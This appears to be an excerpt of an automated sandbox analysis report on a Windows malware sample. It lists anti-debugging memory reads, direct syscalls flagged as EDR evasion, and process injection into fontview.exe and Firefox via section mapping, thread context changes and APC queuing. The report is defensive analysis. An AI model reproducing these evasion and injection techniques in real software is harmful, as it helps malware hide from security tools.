Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_013B29A0 mov eax, dword ptr fs:[00000030h]	10_2_013B29A0
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_013B29A0 mov eax, dword ptr fs:[00000030h]	10_2_013B29A0
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_013B29A0 mov eax, dword ptr fs:[00000030h]	10_2_013B29A0
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_013B29A0 mov eax, dword ptr fs:[00000030h]	10_2_013B29A0
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_013B29A0 mov eax, dword ptr fs:[00000030h]	10_2_013B29A0
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_013B29A0 mov eax, dword ptr fs:[00000030h]	10_2_013B29A0
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_0142E9E0 mov eax, dword ptr fs:[00000030h]	10_2_0142E9E0
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_013D29F9 mov eax, dword ptr fs:[00000030h]	10_2_013D29F9
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_013D29F9 mov eax, dword ptr fs:[00000030h]	10_2_013D29F9
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_013AA9D0 mov eax, dword ptr fs:[00000030h]	10_2_013AA9D0
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_013AA9D0 mov eax, dword ptr fs:[00000030h]	10_2_013AA9D0
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_013AA9D0 mov eax, dword ptr fs:[00000030h]	10_2_013AA9D0
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_013AA9D0 mov eax, dword ptr fs:[00000030h]	10_2_013AA9D0
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_013AA9D0 mov eax, dword ptr fs:[00000030h]	10_2_013AA9D0
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_013AA9D0 mov eax, dword ptr fs:[00000030h]	10_2_013AA9D0
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_013D49D0 mov eax, dword ptr fs:[00000030h]	10_2_013D49D0
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_014289B3 mov esi, dword ptr fs:[00000030h]	10_2_014289B3
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_014289B3 mov eax, dword ptr fs:[00000030h]	10_2_014289B3
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_014289B3 mov eax, dword ptr fs:[00000030h]	10_2_014289B3
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_013C2835 mov eax, dword ptr fs:[00000030h]	10_2_013C2835
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_013C2835 mov eax, dword ptr fs:[00000030h]	10_2_013C2835
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_013C2835 mov eax, dword ptr fs:[00000030h]	10_2_013C2835
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_013C2835 mov ecx, dword ptr fs:[00000030h]	10_2_013C2835
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_013C2835 mov eax, dword ptr fs:[00000030h]	10_2_013C2835
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_013C2835 mov eax, dword ptr fs:[00000030h]	10_2_013C2835
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_013DA830 mov eax, dword ptr fs:[00000030h]	10_2_013DA830
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_0142E872 mov eax, dword ptr fs:[00000030h]	10_2_0142E872
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_0142E872 mov eax, dword ptr fs:[00000030h]	10_2_0142E872
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_01436870 mov eax, dword ptr fs:[00000030h]	10_2_01436870
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_01436870 mov eax, dword ptr fs:[00000030h]	10_2_01436870
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_0142C810 mov eax, dword ptr fs:[00000030h]	10_2_0142C810
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_013A4859 mov eax, dword ptr fs:[00000030h]	10_2_013A4859
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_013A4859 mov eax, dword ptr fs:[00000030h]	10_2_013A4859
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_013D0854 mov eax, dword ptr fs:[00000030h]	10_2_013D0854
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_013B2840 mov ecx, dword ptr fs:[00000030h]	10_2_013B2840
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_0144483A mov eax, dword ptr fs:[00000030h]	10_2_0144483A
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_0144483A mov eax, dword ptr fs:[00000030h]	10_2_0144483A
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_014708C0 mov eax, dword ptr fs:[00000030h]	10_2_014708C0
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_0146A8E4 mov eax, dword ptr fs:[00000030h]	10_2_0146A8E4
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_013A0887 mov eax, dword ptr fs:[00000030h]	10_2_013A0887
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_013DC8F9 mov eax, dword ptr fs:[00000030h]	10_2_013DC8F9
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_013DC8F9 mov eax, dword ptr fs:[00000030h]	10_2_013DC8F9
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_0142C89D mov eax, dword ptr fs:[00000030h]	10_2_0142C89D
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_013CE8C0 mov eax, dword ptr fs:[00000030h]	10_2_013CE8C0
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_01436B40 mov eax, dword ptr fs:[00000030h]	10_2_01436B40
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_01436B40 mov eax, dword ptr fs:[00000030h]	10_2_01436B40
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_0146AB40 mov eax, dword ptr fs:[00000030h]	10_2_0146AB40
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_01448B42 mov eax, dword ptr fs:[00000030h]	10_2_01448B42
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_01454B4B mov eax, dword ptr fs:[00000030h]	10_2_01454B4B
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_01454B4B mov eax, dword ptr fs:[00000030h]	10_2_01454B4B
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_01472B57 mov eax, dword ptr fs:[00000030h]	10_2_01472B57
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_01472B57 mov eax, dword ptr fs:[00000030h]	10_2_01472B57
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_01472B57 mov eax, dword ptr fs:[00000030h]	10_2_01472B57
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_01472B57 mov eax, dword ptr fs:[00000030h]	10_2_01472B57
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_0144EB50 mov eax, dword ptr fs:[00000030h]	10_2_0144EB50
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_013CEB20 mov eax, dword ptr fs:[00000030h]	10_2_013CEB20
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_013CEB20 mov eax, dword ptr fs:[00000030h]	10_2_013CEB20
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_0139CB7E mov eax, dword ptr fs:[00000030h]	10_2_0139CB7E
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_01474B00 mov eax, dword ptr fs:[00000030h]	10_2_01474B00
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_0141EB1D mov eax, dword ptr fs:[00000030h]	10_2_0141EB1D
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_0141EB1D mov eax, dword ptr fs:[00000030h]	10_2_0141EB1D
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_0141EB1D mov eax, dword ptr fs:[00000030h]	10_2_0141EB1D
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_0141EB1D mov eax, dword ptr fs:[00000030h]	10_2_0141EB1D
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_0141EB1D mov eax, dword ptr fs:[00000030h]	10_2_0141EB1D
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_0141EB1D mov eax, dword ptr fs:[00000030h]	10_2_0141EB1D
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_0141EB1D mov eax, dword ptr fs:[00000030h]	10_2_0141EB1D
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_0141EB1D mov eax, dword ptr fs:[00000030h]	10_2_0141EB1D
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_0141EB1D mov eax, dword ptr fs:[00000030h]	10_2_0141EB1D
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_01398B50 mov eax, dword ptr fs:[00000030h]	10_2_01398B50
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_01468B28 mov eax, dword ptr fs:[00000030h]	10_2_01468B28
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_01468B28 mov eax, dword ptr fs:[00000030h]	10_2_01468B28
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_013B0BBE mov eax, dword ptr fs:[00000030h]	10_2_013B0BBE
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_013B0BBE mov eax, dword ptr fs:[00000030h]	10_2_013B0BBE
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_0144EBD0 mov eax, dword ptr fs:[00000030h]	10_2_0144EBD0
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_0142CBF0 mov eax, dword ptr fs:[00000030h]	10_2_0142CBF0
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_013CEBFC mov eax, dword ptr fs:[00000030h]	10_2_013CEBFC
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_013A8BF0 mov eax, dword ptr fs:[00000030h]	10_2_013A8BF0
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_013A8BF0 mov eax, dword ptr fs:[00000030h]	10_2_013A8BF0
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_013A8BF0 mov eax, dword ptr fs:[00000030h]	10_2_013A8BF0
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_01454BB0 mov eax, dword ptr fs:[00000030h]	10_2_01454BB0
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_01454BB0 mov eax, dword ptr fs:[00000030h]	10_2_01454BB0
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_013C0BCB mov eax, dword ptr fs:[00000030h]	10_2_013C0BCB
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_013C0BCB mov eax, dword ptr fs:[00000030h]	10_2_013C0BCB
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_013C0BCB mov eax, dword ptr fs:[00000030h]	10_2_013C0BCB
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_013A0BCD mov eax, dword ptr fs:[00000030h]	10_2_013A0BCD
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_013A0BCD mov eax, dword ptr fs:[00000030h]	10_2_013A0BCD
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_013A0BCD mov eax, dword ptr fs:[00000030h]	10_2_013A0BCD
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_013DCA38 mov eax, dword ptr fs:[00000030h]	10_2_013DCA38
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_013C4A35 mov eax, dword ptr fs:[00000030h]	10_2_013C4A35
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_013C4A35 mov eax, dword ptr fs:[00000030h]	10_2_013C4A35
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_013CEA2E mov eax, dword ptr fs:[00000030h]	10_2_013CEA2E
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_013DCA24 mov eax, dword ptr fs:[00000030h]	10_2_013DCA24
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_0144EA60 mov eax, dword ptr fs:[00000030h]	10_2_0144EA60
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_0141CA72 mov eax, dword ptr fs:[00000030h]	10_2_0141CA72
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_0141CA72 mov eax, dword ptr fs:[00000030h]	10_2_0141CA72
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_013DCA6F mov eax, dword ptr fs:[00000030h]	10_2_013DCA6F
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_013DCA6F mov eax, dword ptr fs:[00000030h]	10_2_013DCA6F
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_013DCA6F mov eax, dword ptr fs:[00000030h]	10_2_013DCA6F
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_0142CA11 mov eax, dword ptr fs:[00000030h]	10_2_0142CA11
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_013B0A5B mov eax, dword ptr fs:[00000030h]	10_2_013B0A5B
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_013B0A5B mov eax, dword ptr fs:[00000030h]	10_2_013B0A5B
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_013A6A50 mov eax, dword ptr fs:[00000030h]	10_2_013A6A50
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_013A6A50 mov eax, dword ptr fs:[00000030h]	10_2_013A6A50
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_013A6A50 mov eax, dword ptr fs:[00000030h]	10_2_013A6A50
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_013A6A50 mov eax, dword ptr fs:[00000030h]	10_2_013A6A50
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_013A6A50 mov eax, dword ptr fs:[00000030h]	10_2_013A6A50
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_013A6A50 mov eax, dword ptr fs:[00000030h]	10_2_013A6A50
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_013A6A50 mov eax, dword ptr fs:[00000030h]	10_2_013A6A50
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_013A8AA0 mov eax, dword ptr fs:[00000030h]	10_2_013A8AA0
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_013A8AA0 mov eax, dword ptr fs:[00000030h]	10_2_013A8AA0
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_013F6AA4 mov eax, dword ptr fs:[00000030h]	10_2_013F6AA4
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_013D8A90 mov edx, dword ptr fs:[00000030h]	10_2_013D8A90
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_013AEA80 mov eax, dword ptr fs:[00000030h]	10_2_013AEA80
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_013AEA80 mov eax, dword ptr fs:[00000030h]	10_2_013AEA80
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_013AEA80 mov eax, dword ptr fs:[00000030h]	10_2_013AEA80
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_013AEA80 mov eax, dword ptr fs:[00000030h]	10_2_013AEA80
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_013AEA80 mov eax, dword ptr fs:[00000030h]	10_2_013AEA80
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_013AEA80 mov eax, dword ptr fs:[00000030h]	10_2_013AEA80
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_013AEA80 mov eax, dword ptr fs:[00000030h]	10_2_013AEA80

Source: C:\Users\user\Desktop\ydJaT4b5N8.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Found direct / indirect Syscall (likely to bypass EDR)

Source: C:\Program Files (x86)\NExWylnGkkJliRPxYIQYdJXjIOmGnCJbOnvlWOgLNtjFgzrSTqcGzgWH\mErdTxurOiTQQ.exe	NtWriteVirtualMemory: Direct from: 0x77762E3C	Jump to behavior
Source: C:\Program Files (x86)\NExWylnGkkJliRPxYIQYdJXjIOmGnCJbOnvlWOgLNtjFgzrSTqcGzgWH\mErdTxurOiTQQ.exe	NtMapViewOfSection: Direct from: 0x77762D1C	Jump to behavior
Source: C:\Program Files (x86)\NExWylnGkkJliRPxYIQYdJXjIOmGnCJbOnvlWOgLNtjFgzrSTqcGzgWH\mErdTxurOiTQQ.exe	NtNotifyChangeKey: Direct from: 0x77763C2C	Jump to behavior
Source: C:\Program Files (x86)\NExWylnGkkJliRPxYIQYdJXjIOmGnCJbOnvlWOgLNtjFgzrSTqcGzgWH\mErdTxurOiTQQ.exe	NtCreateMutant: Direct from: 0x777635CC	Jump to behavior
Source: C:\Program Files (x86)\NExWylnGkkJliRPxYIQYdJXjIOmGnCJbOnvlWOgLNtjFgzrSTqcGzgWH\mErdTxurOiTQQ.exe	NtResumeThread: Direct from: 0x777636AC	Jump to behavior
Source: C:\Program Files (x86)\NExWylnGkkJliRPxYIQYdJXjIOmGnCJbOnvlWOgLNtjFgzrSTqcGzgWH\mErdTxurOiTQQ.exe	NtProtectVirtualMemory: Direct from: 0x77757B2E	Jump to behavior
Source: C:\Program Files (x86)\NExWylnGkkJliRPxYIQYdJXjIOmGnCJbOnvlWOgLNtjFgzrSTqcGzgWH\mErdTxurOiTQQ.exe	NtQuerySystemInformation: Direct from: 0x77762DFC	Jump to behavior
Source: C:\Program Files (x86)\NExWylnGkkJliRPxYIQYdJXjIOmGnCJbOnvlWOgLNtjFgzrSTqcGzgWH\mErdTxurOiTQQ.exe	NtAllocateVirtualMemory: Direct from: 0x77762BFC	Jump to behavior
Source: C:\Program Files (x86)\NExWylnGkkJliRPxYIQYdJXjIOmGnCJbOnvlWOgLNtjFgzrSTqcGzgWH\mErdTxurOiTQQ.exe	NtReadFile: Direct from: 0x77762ADC	Jump to behavior
Source: C:\Program Files (x86)\NExWylnGkkJliRPxYIQYdJXjIOmGnCJbOnvlWOgLNtjFgzrSTqcGzgWH\mErdTxurOiTQQ.exe	NtDelayExecution: Direct from: 0x77762DDC	Jump to behavior
Source: C:\Program Files (x86)\NExWylnGkkJliRPxYIQYdJXjIOmGnCJbOnvlWOgLNtjFgzrSTqcGzgWH\mErdTxurOiTQQ.exe	NtWriteVirtualMemory: Direct from: 0x7776490C	Jump to behavior
Source: C:\Program Files (x86)\NExWylnGkkJliRPxYIQYdJXjIOmGnCJbOnvlWOgLNtjFgzrSTqcGzgWH\mErdTxurOiTQQ.exe	NtQueryInformationProcess: Direct from: 0x77762C26	Jump to behavior
Source: C:\Program Files (x86)\NExWylnGkkJliRPxYIQYdJXjIOmGnCJbOnvlWOgLNtjFgzrSTqcGzgWH\mErdTxurOiTQQ.exe	NtResumeThread: Direct from: 0x77762FBC	Jump to behavior
Source: C:\Program Files (x86)\NExWylnGkkJliRPxYIQYdJXjIOmGnCJbOnvlWOgLNtjFgzrSTqcGzgWH\mErdTxurOiTQQ.exe	NtCreateUserProcess: Direct from: 0x7776371C	Jump to behavior
Source: C:\Program Files (x86)\NExWylnGkkJliRPxYIQYdJXjIOmGnCJbOnvlWOgLNtjFgzrSTqcGzgWH\mErdTxurOiTQQ.exe	NtSetInformationThread: Direct from: 0x777563F9	Jump to behavior
Source: C:\Program Files (x86)\NExWylnGkkJliRPxYIQYdJXjIOmGnCJbOnvlWOgLNtjFgzrSTqcGzgWH\mErdTxurOiTQQ.exe	NtAllocateVirtualMemory: Direct from: 0x77763C9C	Jump to behavior
Source: C:\Program Files (x86)\NExWylnGkkJliRPxYIQYdJXjIOmGnCJbOnvlWOgLNtjFgzrSTqcGzgWH\mErdTxurOiTQQ.exe	NtSetInformationThread: Direct from: 0x77762B4C	Jump to behavior
Source: C:\Program Files (x86)\NExWylnGkkJliRPxYIQYdJXjIOmGnCJbOnvlWOgLNtjFgzrSTqcGzgWH\mErdTxurOiTQQ.exe	NtQueryAttributesFile: Direct from: 0x77762E6C	Jump to behavior
Source: C:\Program Files (x86)\NExWylnGkkJliRPxYIQYdJXjIOmGnCJbOnvlWOgLNtjFgzrSTqcGzgWH\mErdTxurOiTQQ.exe	NtClose: Direct from: 0x77762B6C
Source: C:\Program Files (x86)\NExWylnGkkJliRPxYIQYdJXjIOmGnCJbOnvlWOgLNtjFgzrSTqcGzgWH\mErdTxurOiTQQ.exe	NtReadVirtualMemory: Direct from: 0x77762E8C	Jump to behavior
Source: C:\Program Files (x86)\NExWylnGkkJliRPxYIQYdJXjIOmGnCJbOnvlWOgLNtjFgzrSTqcGzgWH\mErdTxurOiTQQ.exe	NtCreateKey: Direct from: 0x77762C6C	Jump to behavior
Source: C:\Program Files (x86)\NExWylnGkkJliRPxYIQYdJXjIOmGnCJbOnvlWOgLNtjFgzrSTqcGzgWH\mErdTxurOiTQQ.exe	NtQuerySystemInformation: Direct from: 0x777648CC	Jump to behavior
Source: C:\Program Files (x86)\NExWylnGkkJliRPxYIQYdJXjIOmGnCJbOnvlWOgLNtjFgzrSTqcGzgWH\mErdTxurOiTQQ.exe	NtAllocateVirtualMemory: Direct from: 0x777648EC	Jump to behavior
Source: C:\Program Files (x86)\NExWylnGkkJliRPxYIQYdJXjIOmGnCJbOnvlWOgLNtjFgzrSTqcGzgWH\mErdTxurOiTQQ.exe	NtQueryVolumeInformationFile: Direct from: 0x77762F2C	Jump to behavior
Source: C:\Program Files (x86)\NExWylnGkkJliRPxYIQYdJXjIOmGnCJbOnvlWOgLNtjFgzrSTqcGzgWH\mErdTxurOiTQQ.exe	NtOpenSection: Direct from: 0x77762E0C	Jump to behavior
Source: C:\Program Files (x86)\NExWylnGkkJliRPxYIQYdJXjIOmGnCJbOnvlWOgLNtjFgzrSTqcGzgWH\mErdTxurOiTQQ.exe	NtDeviceIoControlFile: Direct from: 0x77762AEC	Jump to behavior
Source: C:\Program Files (x86)\NExWylnGkkJliRPxYIQYdJXjIOmGnCJbOnvlWOgLNtjFgzrSTqcGzgWH\mErdTxurOiTQQ.exe	NtAllocateVirtualMemory: Direct from: 0x77762BEC	Jump to behavior
Source: C:\Program Files (x86)\NExWylnGkkJliRPxYIQYdJXjIOmGnCJbOnvlWOgLNtjFgzrSTqcGzgWH\mErdTxurOiTQQ.exe	NtQueryInformationToken: Direct from: 0x77762CAC	Jump to behavior
Source: C:\Program Files (x86)\NExWylnGkkJliRPxYIQYdJXjIOmGnCJbOnvlWOgLNtjFgzrSTqcGzgWH\mErdTxurOiTQQ.exe	NtTerminateThread: Direct from: 0x77762FCC	Jump to behavior
Source: C:\Program Files (x86)\NExWylnGkkJliRPxYIQYdJXjIOmGnCJbOnvlWOgLNtjFgzrSTqcGzgWH\mErdTxurOiTQQ.exe	NtCreateFile: Direct from: 0x77762FEC	Jump to behavior
Source: C:\Program Files (x86)\NExWylnGkkJliRPxYIQYdJXjIOmGnCJbOnvlWOgLNtjFgzrSTqcGzgWH\mErdTxurOiTQQ.exe	NtOpenFile: Direct from: 0x77762DCC	Jump to behavior
Source: C:\Program Files (x86)\NExWylnGkkJliRPxYIQYdJXjIOmGnCJbOnvlWOgLNtjFgzrSTqcGzgWH\mErdTxurOiTQQ.exe	NtOpenKeyEx: Direct from: 0x77762B9C	Jump to behavior
Source: C:\Program Files (x86)\NExWylnGkkJliRPxYIQYdJXjIOmGnCJbOnvlWOgLNtjFgzrSTqcGzgWH\mErdTxurOiTQQ.exe	NtSetInformationProcess: Direct from: 0x77762C5C	Jump to behavior
Source: C:\Program Files (x86)\NExWylnGkkJliRPxYIQYdJXjIOmGnCJbOnvlWOgLNtjFgzrSTqcGzgWH\mErdTxurOiTQQ.exe	NtProtectVirtualMemory: Direct from: 0x77762F9C	Jump to behavior

Injects a PE file into a foreign processes

Source: C:\Users\user\Desktop\ydJaT4b5N8.exe

Memory written: C:\Users\user\Desktop\ydJaT4b5N8.exe base: 400000 value starts with: 4D5A

Jump to behavior

Maps a DLL or memory area into another process

Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Section loaded: NULL target: C:\Program Files (x86)\NExWylnGkkJliRPxYIQYdJXjIOmGnCJbOnvlWOgLNtjFgzrSTqcGzgWH\mErdTxurOiTQQ.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Section loaded: NULL target: C:\Windows\SysWOW64\fontview.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\fontview.exe	Section loaded: NULL target: C:\Program Files (x86)\NExWylnGkkJliRPxYIQYdJXjIOmGnCJbOnvlWOgLNtjFgzrSTqcGzgWH\mErdTxurOiTQQ.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\fontview.exe	Section loaded: NULL target: C:\Program Files (x86)\NExWylnGkkJliRPxYIQYdJXjIOmGnCJbOnvlWOgLNtjFgzrSTqcGzgWH\mErdTxurOiTQQ.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\fontview.exe	Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\fontview.exe	Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write	Jump to behavior

Modifies the context of a thread in another process (thread injection)

Source: C:\Windows\SysWOW64\fontview.exe

Thread register set: target process: 7992

Jump to behavior

Queues an APC in another process (thread injection)

Source: C:\Windows\SysWOW64\fontview.exe

Thread APC queued: target process: C:\Program Files (x86)\NExWylnGkkJliRPxYIQYdJXjIOmGnCJbOnvlWOgLNtjFgzrSTqcGzgWH\mErdTxurOiTQQ.exe

Jump to behavior

Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Process created: C:\Users\user\Desktop\ydJaT4b5N8.exe "C:\Users\user\Desktop\ydJaT4b5N8.exe"	Jump to behavior
Source: C:\Program Files (x86)\NExWylnGkkJliRPxYIQYdJXjIOmGnCJbOnvlWOgLNtjFgzrSTqcGzgWH\mErdTxurOiTQQ.exe	Process created: C:\Windows\SysWOW64\fontview.exe "C:\Windows\SysWOW64\fontview.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\fontview.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"	Jump to behavior

Source: mErdTxurOiTQQ.exe, 0000000B.00000002.3126162382.0000000000FA0000.00000002.00000001.00040000.00000000.sdmp, mErdTxurOiTQQ.exe, 0000000B.00000000.1583381977.0000000000FA1000.00000002.00000001.00040000.00000000.sdmp, mErdTxurOiTQQ.exe, 0000000D.00000002.3126721072.0000000001700000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Shell_TrayWnd
Source: mErdTxurOiTQQ.exe, 0000000B.00000002.3126162382.0000000000FA0000.00000002.00000001.00040000.00000000.sdmp, mErdTxurOiTQQ.exe, 0000000B.00000000.1583381977.0000000000FA1000.00000002.00000001.00040000.00000000.sdmp, mErdTxurOiTQQ.exe, 0000000D.00000002.3126721072.0000000001700000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progman
Source: mErdTxurOiTQQ.exe, 0000000B.00000002.3126162382.0000000000FA0000.00000002.00000001.00040000.00000000.sdmp, mErdTxurOiTQQ.exe, 0000000B.00000000.1583381977.0000000000FA1000.00000002.00000001.00040000.00000000.sdmp, mErdTxurOiTQQ.exe, 0000000D.00000002.3126721072.0000000001700000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: ?Program Manager
